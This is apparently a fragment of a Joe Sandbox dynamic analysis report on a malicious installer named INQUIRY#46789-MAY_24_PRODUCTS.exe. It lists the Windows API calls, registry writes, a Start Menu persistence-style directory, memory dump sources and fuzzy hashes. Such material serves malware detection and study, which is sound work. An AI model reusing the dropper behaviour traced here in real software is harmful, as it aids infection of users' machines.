                              • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsd31E2.tmp,00000023,00000011,00000002), ref: 00402421
                              • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsd31E2.tmp,00000000,00000011,00000002), ref: 0040245E
                              • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsd31E2.tmp,00000000,00000011,00000002), ref: 00402542
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: CloseValuelstrlen
                              • String ID: C:\Users\user\AppData\Local\Temp\nsd31E2.tmp
                              • API String ID: 2655323295-4201475638
                              • Opcode ID: 57d82d557112082bf27dcdaa3b3a6fb00c9060ac7b5473e8dd8cb218f70b9ac1
                              • Instruction ID: 52a398de0ffa64e75c678b0ba9290c89a7bc7a6ef294ba5bc2d5d90b06733894
                              • Opcode Fuzzy Hash: 57d82d557112082bf27dcdaa3b3a6fb00c9060ac7b5473e8dd8cb218f70b9ac1
                              • Instruction Fuzzy Hash: C8118171E00215BEEB10EFA59E49AAEBA74EB54318F20843BF504F71D1CAB94D419B68
                              APIs
                              • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 0040202E
                                • Part of subcall function 004050C7: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd31E2.tmp\System.dll,00000000,0041C228,761923A0,?,?,?,?,?,?,?,?,?,004030F7,00000000,?), ref: 00405100
                                • Part of subcall function 004050C7: lstrlenA.KERNEL32(004030F7,Skipped: C:\Users\user\AppData\Local\Temp\nsd31E2.tmp\System.dll,00000000,0041C228,761923A0,?,?,?,?,?,?,?,?,?,004030F7,00000000), ref: 00405110
                                • Part of subcall function 004050C7: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd31E2.tmp\System.dll,004030F7,004030F7,Skipped: C:\Users\user\AppData\Local\Temp\nsd31E2.tmp\System.dll,00000000,0041C228,761923A0), ref: 00405123
                                • Part of subcall function 004050C7: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsd31E2.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsd31E2.tmp\System.dll), ref: 00405135
                                • Part of subcall function 004050C7: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040515B
                                • Part of subcall function 004050C7: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405175
                                • Part of subcall function 004050C7: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405183
                              • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 0040203E
                              • GetProcAddress.KERNEL32(00000000,?), ref: 0040204E
                              • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 004020B8
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                              • String ID:
                              • API String ID: 2987980305-0
                              • Opcode ID: abecd26dfb3de0ce52c950ba2215734ba3e8e38533135c2a8ac1c574d6d38cf5
                              • Instruction ID: c1ae46b168e5b47a3396f215b5b678e2f7e13ad55da110dce54edd367ac60368
                              • Opcode Fuzzy Hash: abecd26dfb3de0ce52c950ba2215734ba3e8e38533135c2a8ac1c574d6d38cf5
                              • Instruction Fuzzy Hash: D221C671A00215ABCF207FA48F4DBAE7A70AB54319F60413BE601B21D0CBBD49429A6E
                              APIs
                              • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C32
                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402C3B
                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402C5C
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: Close$Enum
                              • String ID:
                              • API String ID: 464197530-0
                              • Opcode ID: 36a723ba0b9fe6841f0d996bf234943a63eacbada2c77057d577eaa1ff2cf2a2
                              • Instruction ID: bf26dd322600c86e705ae03821e5e95be148f4b98a6ddde11b8b46473537de7c
                              • Opcode Fuzzy Hash: 36a723ba0b9fe6841f0d996bf234943a63eacbada2c77057d577eaa1ff2cf2a2
                              • Instruction Fuzzy Hash: 0E115832504109FBEF129F90CF09F9E7B69AB08380F104076BD45B51E0EBB59E11AAA8
                              APIs
                                • Part of subcall function 004059D1: CharNextA.USER32(?,?,0042BC78,?,00405A3D,0042BC78,0042BC78,76193410,?,C:\Users\user\AppData\Local\Temp\,00405788,?,76193410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004059DF
                                • Part of subcall function 004059D1: CharNextA.USER32(00000000), ref: 004059E4
                                • Part of subcall function 004059D1: CharNextA.USER32(00000000), ref: 004059F8
                              • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                • Part of subcall function 0040558D: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004055D0
                              • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Spore,00000000,00000000,000000F0), ref: 0040163C
                              Strings
                              • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Spore, xrefs: 00401631
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                              • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Spore
                              • API String ID: 1892508949-3990153789
                              • Opcode ID: 1e12dc58e4d13fb2c03f22d9bcf658ec8ff8130bfea1f6cb9c78c2b11c1f55b0
                              • Instruction ID: df45c6993d6bc62f872b04d9318ddfa5d1dc0af5cd0ca16cddc76749c9d8dee7
                              • Opcode Fuzzy Hash: 1e12dc58e4d13fb2c03f22d9bcf658ec8ff8130bfea1f6cb9c78c2b11c1f55b0
                              • Instruction Fuzzy Hash: B6112731608152EBCF217BB54D419BF66B0DA92324F68093FE5D1B22E2D63D49439A3F
                              APIs
                              • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C078,Error launching installer), ref: 00405668
                              • CloseHandle.KERNEL32(?), ref: 00405675
                              Strings
                              • Error launching installer, xrefs: 00405652
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: CloseCreateHandleProcess
                              • String ID: Error launching installer
                              • API String ID: 3712363035-66219284
                              • Opcode ID: a2b9ecb8406674d5a7d1aded78611502900df459338db245270d40db8d5eaf79
                              • Instruction ID: cd0db04dc70eb2db95c0507bc2818c98f3fa4352d1ad4fdf37015ca79918bc5c
                              • Opcode Fuzzy Hash: a2b9ecb8406674d5a7d1aded78611502900df459338db245270d40db8d5eaf79
                              • Instruction Fuzzy Hash: 2FE046F0640209BFEB109FB0EE49F7F7AADEB00704F404561BD00F2190EA7498088A7C
                              APIs
                              • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402517
                              • RegEnumValueA.ADVAPI32(00000000,00000000,?,?), ref: 0040252A
                              • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsd31E2.tmp,00000000,00000011,00000002), ref: 00402542
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: Enum$CloseValue
                              • String ID:
                              • API String ID: 397863658-0
                              • Opcode ID: fe11d6a5c121a434299ef885feeb2d1068af58094f9e7a5c63dd1c2f174868b0
                              • Instruction ID: d6682fe5282a570b067a4eb437d7391ea775acd6fa74fe75c745453303d77b76
                              • Opcode Fuzzy Hash: fe11d6a5c121a434299ef885feeb2d1068af58094f9e7a5c63dd1c2f174868b0
                              • Instruction Fuzzy Hash: FF01B1B1A00205BFEB119FA59E9CEBF7A7CDF40348F10003EF005A61C0DAB84A459729
                              APIs
                              • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024A3
                              • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsd31E2.tmp,00000000,00000011,00000002), ref: 00402542
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: CloseQueryValue
                              • String ID:
                              • API String ID: 3356406503-0
                              • Opcode ID: 9faefa671d32cd00ae6c9ab0d3038af98ca3d674d6845910c3f8f86525e159a4
                              • Instruction ID: 95e09d1afac246f862a709281cbe64e29327228dc2655ecd66478bf0894335ce
                              • Opcode Fuzzy Hash: 9faefa671d32cd00ae6c9ab0d3038af98ca3d674d6845910c3f8f86525e159a4
                              • Instruction Fuzzy Hash: 9811A371A01205FFDB15DF64DA989AEBBB4DF10348F20843FE445B72C0D6B84A85DB69
                              APIs
                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                              • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: MessageSend
                              • String ID:
                              • API String ID: 3850602802-0
                              • Opcode ID: 99d94b6b7251e12d57a26b250e6e72915567ed6026f147eeb310830d1348a8a6
                              • Instruction ID: f90ead50954d10692fd747fd35726c7c61e2fcf071c036ef7d407bcf2d164b43
                              • Opcode Fuzzy Hash: 99d94b6b7251e12d57a26b250e6e72915567ed6026f147eeb310830d1348a8a6
                              • Instruction Fuzzy Hash: 4601F4317242109BE7199B399D04B6A3698E710719F54823FF852F61F1D678EC028B4C
                              APIs
                              • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 004023A2
                              • RegCloseKey.ADVAPI32(00000000), ref: 004023AB
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: CloseDeleteValue
                              • String ID:
                              • API String ID: 2831762973-0
                              • Opcode ID: 23a66d4d5fdd4b42974711a2d0e6844d1454a946aa1d815d9b14ac0364ce1981
                              • Instruction ID: dc076c437d6f5be21cba980f304133fc6836ac47c1eada38d5944ea3460b530d
                              • Opcode Fuzzy Hash: 23a66d4d5fdd4b42974711a2d0e6844d1454a946aa1d815d9b14ac0364ce1981
                              • Instruction Fuzzy Hash: CCF09C32B00511ABD711BBE49B8EABE76A49B40314F25043FE602B71C1DAFC4D02876D
                              APIs
                              • ShowWindow.USER32(00000000,00000000), ref: 00401E49
                              • EnableWindow.USER32(00000000,00000000), ref: 00401E54
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: Window$EnableShow
                              • String ID:
                              • API String ID: 1136574915-0
                              • Opcode ID: 76e0b40bc866335bf4808b12ec94f7b59f7a2b12cc41b8e9cd369490a2b1e57e
                              • Instruction ID: 301f435b7022e7a65e96077de8e5544ac5a8ca3f4637985cbe4ed7087a67720a
                              • Opcode Fuzzy Hash: 76e0b40bc866335bf4808b12ec94f7b59f7a2b12cc41b8e9cd369490a2b1e57e
                              • Instruction Fuzzy Hash: DAE01272B04212AFDB14EBE5EA499EEB7B4DF40329B10443FE411F11D1DA7849419F5D
                              APIs
                              • ShowWindow.USER32(000103CA), ref: 00401581
                              • ShowWindow.USER32(000103C4), ref: 00401596
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: ShowWindow
                              • String ID:
                              • API String ID: 1268545403-0
                              • Opcode ID: 03acd6c05ef192acc4d5f2074103963a61a151cba363b2b3f7df3f6f04565d96
                              • Instruction ID: e287d0ceb598eb1b66b9bd8bf9e10b03538a68cca7d7f2c53772450b733fb655
                              • Opcode Fuzzy Hash: 03acd6c05ef192acc4d5f2074103963a61a151cba363b2b3f7df3f6f04565d96
                              • Instruction Fuzzy Hash: 0CE086767001119BCB24DBA4ED94CBE77A5D784320754053FD502F3290C674AD41CB68
                              APIs
                              • GetModuleHandleA.KERNEL32(?,?,?,0040327F,0000000A), ref: 0040634A
                              • GetProcAddress.KERNEL32(00000000,?), ref: 00406365
                                • Part of subcall function 004062CA: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004062E1
                                • Part of subcall function 004062CA: wsprintfA.USER32 ref: 0040631A
                                • Part of subcall function 004062CA: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040632E
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                              • String ID:
                              • API String ID: 2547128583-0
                              • Opcode ID: 8b993a8f6eb8e905ca30c67f896f6c6ad868427c201d07e664c6abec48b1d465
                              • Instruction ID: b6ec051a43833f1e75efb6c097fb1b7945085d0745a1c08503facd7b36b6f755
                              • Opcode Fuzzy Hash: 8b993a8f6eb8e905ca30c67f896f6c6ad868427c201d07e664c6abec48b1d465
                              • Instruction Fuzzy Hash: 88E08C32604210ABD2106A709E0493B63A9AF88710306483EFA46F2240DB389C3696AD
                              APIs
                              • GetFileAttributesA.KERNELBASE(00000003,00402DA3,C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe,80000000,00000003), ref: 00405B3D
                              • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B5F
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: File$AttributesCreate
                              • String ID:
                              • API String ID: 415043291-0
                              • Opcode ID: 80243517f436f95d2d00e5b5224d95f101b34955670c918b0becce4e09b30ec3
                              • Instruction ID: 6905ba7dec075751c4c8bdaf1e97cd52a4ed4154a0977e2bcfee25d1bc4df630
                              • Opcode Fuzzy Hash: 80243517f436f95d2d00e5b5224d95f101b34955670c918b0becce4e09b30ec3
                              • Instruction Fuzzy Hash: F5D09E31254201EFEF098F20DE16F2EBBA2EB94B00F11952CB682944E1DA715819AB19
                              APIs
                              • CreateDirectoryA.KERNELBASE(?,00000000,004031FF,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00405610
                              • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 0040561E
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
